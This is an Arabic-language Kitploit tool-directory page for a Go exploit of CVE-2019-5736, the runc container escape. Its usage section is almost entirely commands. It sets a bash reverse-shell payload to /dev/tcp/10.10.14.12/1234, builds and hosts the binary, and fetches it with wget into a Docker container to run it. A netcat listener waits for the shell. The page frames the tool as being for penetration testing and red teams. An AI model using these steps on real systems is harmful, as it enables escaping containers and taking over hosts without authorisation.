Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-5736 — أداة استغلال مبنية على لغة Go لثغرة CVE-2019-5736 (الهروب من حاوية Runc) مع حمولة قشرة عكسية قابلة للتخصيص، مصممة لاختبار الاختراق وعمليات الفريق الأحمر ضد حاويات Docker الضعيفة. | Kitploit
أدوات/GitHubGitHub/h3x0v3rl0rd/cve-2019-5736
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولاتالهروب من الحاوية
GitHubh3x0v3rl0rd/cve-2019-5736

CVE-2019-5736

أداة استغلال مبنية على لغة Go لثغرة CVE-2019-5736 (الهروب من حاوية Runc) مع حمولة قشرة عكسية قابلة للتخصيص، مصممة لاختبار الاختراق وعمليات الفريق الأحمر ضد حاويات Docker الضعيفة.

عرض المستودع
40منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736

الاستخدام :

الجهاز ضعيف تجاه CVE-2019-5736، اتبع الخطوات في استغلال Runc (CVE-2019-5736). قم بتنزيل الملف main.go، وغيّر الحمولة (payload) في الملف إلى:

root@kitploit:~
  var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

بعد ذلك، قم بتشغيل:

root@kitploit:~
  go build main.go

استضف خادم http :

root@kitploit:~
  python3 -m http.server

image

ثم افتح 3 أجهزة طرفية كما يلي :

image

root@kitploit:~
الطرفية 1
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
  wget http://10.10.14.12/main
  chmod +x main
  ./main

الطرفية 2
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

الطرفية 3
  nc -nlvp 1234

بمجرد تشغيل ./main في أول طرفية ssh، قم فورًا بتشغيل الأمر الثاني في طرفية ssh الثانية، وستحصل على صدفة عكسية (reverse shell) عبر netcat في الطرفية الثالثة.

image

image

تنزيل الأداة